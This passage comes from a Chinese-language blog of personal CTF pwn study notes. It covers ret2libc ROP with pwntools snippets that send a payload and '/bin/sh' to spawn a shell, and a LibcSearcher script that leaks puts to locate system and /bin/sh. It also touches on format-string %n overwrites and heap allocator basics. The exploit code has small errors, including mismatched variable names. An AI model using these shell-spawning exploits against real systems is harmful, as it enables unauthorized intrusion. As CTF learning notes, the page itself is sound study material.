class="line">sh.sendline(payload)</span><br><span class="line">sh.sendline(<span class="string">&#x27;/bin/sh&#x27;</span>)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>需要注意的是，我这里向程序中 bss 段的 buf2 处写入 /bin/sh 字符串，并将其地址作为 system 的参数传入。这样以便于可以获得 shell。</p>
<p><strong>这里我们说为什么不能直接把/bin/sh代替buf2作为参数？我猜的是栈应该存放的是变量的地址。</strong></p>
<h4 id="使用条件-4"><a href="#使用条件-4" class="headerlink" title="使用条件"></a><strong>使用条件</strong></h4><p><strong>有system函数但是没有/bin/sh字符串，需要写入/bin/sh字符串并存到一段内存中，将地址在放到函数中去</strong></p>
<h3 id="例-3"><a href="#例-3" class="headerlink" title="例 3"></a><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#3">例 3</a></h3><h4 id="使用条件-5"><a href="#使用条件-5" class="headerlink" title="**使用条件 **"></a>**使用条件 **</h4><p><strong>程序中没有system和bin/sh字符串并且是栈不可执行条件。</strong></p>
<h4 id="使用方法-3"><a href="#使用方法-3" class="headerlink" title="使用方法"></a><a href="D:\CX_appoincation\Typora\Node\PWN\题目总集">使用方法</a></h4><p><strong>见题目 BUU ciscn_2019_c_1（ret2libc_3）</strong></p>
<h4 id="LibcSearcher包的基本使用"><a href="#LibcSearcher包的基本使用" class="headerlink" title="LibcSearcher包的基本使用"></a><code>LibcSearcher</code>包的基本使用</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *  </span><br><span class="line"><span class="comment">#包的导入</span></span><br><span class="line"></span><br><span class="line">io=remote(<span class="string">&#x27;xxx&#x27;</span>,xxx)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./ciscn_2019_c_1&#x27;</span>) </span><br><span class="line"><span class="comment">#加载ELF文件才能查询程序中函数地址</span></span><br><span class="line"></span><br><span class="line">main=elf.sym[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line"><span class="comment">#得到main函数的地址，全称是elf.symbols[&#x27;main&#x27;]</span></span><br><span class="line">puts_plt=elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line"><span class="comment">#得到puts函数的pit地址，即函数执行地址。</span></span><br><span class="line">puts_got=elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line"><span class="comment">#得到puts函数的got表。</span></span><br><span class="line"></span><br><span class="line">puts_addr = u32(sh.recv(<span class="number">4</span>))</span><br><span class="line"><span class="comment">#得到puts的实际地址。</span></span><br><span class="line"></span><br><span class="line">libc=LibcSearcher(<span class="string">&#x27;puts&#x27;</span>,puts)</span><br><span class="line"><span class="comment">#获取libc版本</span></span><br><span class="line"></span><br><span class="line">libc_addr =puts_addr-libc.dump(<span class="string">&#x27;puts&#x27;</span>)</span><br><span class="line"><span class="comment">#偏移地址</span></span><br><span class="line"></span><br><span class="line">binsh=libc_addr+libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line"><span class="comment">#得到/bin/sh的libc基地址</span></span><br><span class="line"></span><br><span class="line">system=libc_addr+libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line"><span class="comment">#得到system的libc基地址</span></span><br><span class="line"></span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc_32.so.6&#x27;</span>)</span><br><span class="line"><span class="comment">#程序中已有动态链接器</span></span><br></pre></td></tr></table></figure>

<h1 id="格式化字符串"><a href="#格式化字符串" class="headerlink" title="格式化字符串"></a><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-intro/">格式化字符串</a></h1><h2 id="栈内存泄露和覆盖"><a href="#栈内存泄露和覆盖" class="headerlink" title="栈内存泄露和覆盖"></a><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-exploit/#_4">栈内存泄露和覆盖</a></h2><p><a href="D:\CX_appoincation\Typora\Node\PWN\题目总集">见题目 BUU  [第五空间2019 决赛]PWN5</a></p>
<p>栈内存覆盖要确保我们修改地址中的内容是在栈中的，才能通过%n覆盖</p>
<h2 id="任意内存泄露和覆盖"><a href="#任意内存泄露和覆盖" class="headerlink" title="任意内存泄露和覆盖"></a>任意内存泄露和覆盖</h2><h1 id="堆概述"><a href="#堆概述" class="headerlink" title="堆概述"></a>堆概述</h1><p>堆管理器处于用户程序与内核之间，用于响应用户的申请内核请求，以及管理用户所释放的内存。</p>
<p>现在Linux的堆管理器是<code>ptmalloc2</code>通过<code>malloc/free</code>来分配和释放内存块。这些函数背后的系统调用主要是<code>(s)brk</code>函数以及<code>mmap</code>函数</p>
<p><code>pwndgb</code>用于调试<code>heap</code>内容</p>
<h2 id="相关函数"><a href="#相关函数" class="headerlink" title="相关函数"></a>相关函数</h2><h3 id="calloc函数"><a href="#calloc函数" class="headerlink" title="calloc函数"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/weibo1230123/article/details/81503135"><code>calloc</code>函数</a></h3><blockquote>
<p>*<strong>p = ( * type)calloc(size_t n, size_t sizeof (type))</strong></p>
</blockquote>
<p><code>size_t n</code>为申请的类型空间，<code>sizeof(type)</code>为一个类型的字节数。<code>calloc</code>在申请空间后会对空间进行清零。即执行<code>memset(p, 0, sizeof(type)*n)</code>。</p>
<p><strong>函数返回的是申请空间的首地址。</strong></p>
<h3 id="mmap函数"><a href="#mmap函数" class="headerlink" title="mmap函数"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/bhniunan/article/details/104105153"><code>mmap</code>函数</a></h3><blockquote>
<p>*<em>void * mmap( void <em>start , size_t length , int prot, int flags, int fd, off_t offset);</em></em></p>
</blockquote>
<p>《程修》P307，像操作系统申请一段虚拟空间，可以映射某个文件，申请的空间的起始地址和大小都必须是系统页的大小的整数倍。</p>
<h1 id="bin-sh"><a href="#bin-sh" class="headerlink" title="bin/sh"></a><strong>bin/sh</strong></h1><p>“/bin///sh”、”/bin/sh”、”sh”、”cat flag”、”cat flag.txt”的作用是相同的。</p>
<p>在bin目录下有sh，执行就能打开终端。</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2022/02/12/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" data-id="cl26coj210001u0uq8s8u255m" data-title="" class="article-share-link">Share</a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2022/04/19/hexo%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          hexo博客搭建
        
      </div>
    </a>
  
  
    <a href="/2022/01/10/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Hello World</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/04/">April 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/02/">February 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/01/">January 2022</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/04/19/hexo%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/">hexo博客搭建</a>
          </li>
        
          <li>
            <a href="/2022/02/12/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">(no title)</a>
          </li>
        
          <li>
            <a href="/2022/01/10/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2022 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>